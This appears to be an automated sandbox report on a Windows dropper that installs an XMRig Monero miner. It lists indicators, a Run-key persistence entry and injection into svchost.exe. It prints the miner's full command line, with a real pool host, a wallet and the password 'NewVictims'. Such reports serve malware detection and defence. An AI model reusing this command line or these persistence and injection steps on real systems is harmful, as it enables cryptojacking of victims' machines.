Analysis
-
max time kernel
152s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
16-05-2022 12:54
Static task
static1
Behavioral task
behavioral1
Sample
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
Resource
win10v2004-20220414-en
General
-
Target
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
-
Size
19.7MB
-
MD5
59d485e89a3c1b7e0fd31aeaa01c4a26
-
SHA1
ae6e6326ad6198add70b74e89f747f622fd1bbd3
-
SHA256
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398
-
SHA512
0d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b
Malware Config
Signatures
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4060-138-0x0000000140000000-0x0000000140753000-memory.dmp xmrig behavioral2/memory/4060-139-0x000000014029169C-mapping.dmp xmrig behavioral2/memory/4060-140-0x0000000140000000-0x0000000140753000-memory.dmp xmrig behavioral2/memory/4060-141-0x0000000140000000-0x0000000140753000-memory.dmp xmrig behavioral2/memory/4060-144-0x0000000140000000-0x0000000140753000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
lolupdate.exepid process 4664 lolupdate.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 4060 svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lolupdate.exe = "C:\\Users\\Admin\\AppData\\Roaming\\lolupdate.exe" 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lolupdate.exedescription pid process target process PID 4664 set thread context of 4060 4664 lolupdate.exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exepid process 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exelolupdate.exesvchost.exedescription pid process Token: SeDebugPrivilege 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe Token: SeDebugPrivilege 4664 lolupdate.exe Token: SeLockMemoryPrivilege 4060 svchost.exe Token: SeLockMemoryPrivilege 4060 svchost.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exelolupdate.exedescription pid process target process PID 4644 wrote to memory of 4664 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe lolupdate.exe PID 4644 wrote to memory of 4664 4644 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe lolupdate.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe PID 4664 wrote to memory of 4060 4664 lolupdate.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe"C:\Users\Admin\AppData\Local\Temp\6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\lolupdate.exe"C:\Users\Admin\AppData\Roaming\lolupdate.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe --opencl --cuda --donate-level=4 -B --coin=monero --url=gulf.moneroocean.stream:10128 --user=491AFfs2Fhj9c1AXyinqpn5TJTAb5JqAC1G1WAjKfTj8KAeuFHHP3USSVvFLFnw132LwCzVgfxNDmaWfXPyXDyBj4yVW3Vv --pass=NewVictims --cpu-max-threads-hint=70 --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --cuda-loader="C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dll"3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dllFilesize
19.5MB
MD54b9507ee2bfd925468b952c57fb694ed
SHA16d46148f43d09f681ff88279ed047a7ab5cd4ea2
SHA2561b2b4b6ef86fc06d680821da380232d7c7885fcbf9b9f012c46a3e2699654ba1
SHA51284bc4bf118e9055f4cca9fcb974ead33b8130ced53f736ab8e75596cb2e7567d5c24db88fa4ce6a17c465775a6e618d4697a82ddac8e30b70bc269f3ab5333df
-
C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dllFilesize
19.5MB
MD54b9507ee2bfd925468b952c57fb694ed
SHA16d46148f43d09f681ff88279ed047a7ab5cd4ea2
SHA2561b2b4b6ef86fc06d680821da380232d7c7885fcbf9b9f012c46a3e2699654ba1
SHA51284bc4bf118e9055f4cca9fcb974ead33b8130ced53f736ab8e75596cb2e7567d5c24db88fa4ce6a17c465775a6e618d4697a82ddac8e30b70bc269f3ab5333df
-
C:\Users\Admin\AppData\Roaming\lolupdate.exeFilesize
19.7MB
MD559d485e89a3c1b7e0fd31aeaa01c4a26
SHA1ae6e6326ad6198add70b74e89f747f622fd1bbd3
SHA2566d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398
SHA5120d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b
-
C:\Users\Admin\AppData\Roaming\lolupdate.exeFilesize
19.7MB
MD559d485e89a3c1b7e0fd31aeaa01c4a26
SHA1ae6e6326ad6198add70b74e89f747f622fd1bbd3
SHA2566d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398
SHA5120d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b
-
memory/4060-138-0x0000000140000000-0x0000000140753000-memory.dmpFilesize
7.3MB
-
memory/4060-144-0x0000000140000000-0x0000000140753000-memory.dmpFilesize
7.3MB
-
memory/4060-147-0x000001C2250E0000-0x000001C225100000-memory.dmpFilesize
128KB
-
memory/4060-146-0x000001C2235D0000-0x000001C2235F0000-memory.dmpFilesize
128KB
-
memory/4060-142-0x000001C223570000-0x000001C223584000-memory.dmpFilesize
80KB
-
memory/4060-139-0x000000014029169C-mapping.dmp
-
memory/4060-140-0x0000000140000000-0x0000000140753000-memory.dmpFilesize
7.3MB
-
memory/4060-141-0x0000000140000000-0x0000000140753000-memory.dmpFilesize
7.3MB
-
memory/4644-130-0x0000000000E40000-0x0000000002202000-memory.dmpFilesize
19.8MB
-
memory/4644-131-0x00007FFDAAF90000-0x00007FFDABA51000-memory.dmpFilesize
10.8MB
-
memory/4664-132-0x0000000000000000-mapping.dmp
-
memory/4664-135-0x00007FFDAAF90000-0x00007FFDABA51000-memory.dmpFilesize
10.8MB
-
memory/4664-137-0x0000000002440000-0x000000000244A000-memory.dmpFilesize
40KB
-
memory/4664-136-0x0000000002450000-0x0000000002462000-memory.dmpFilesize
72KB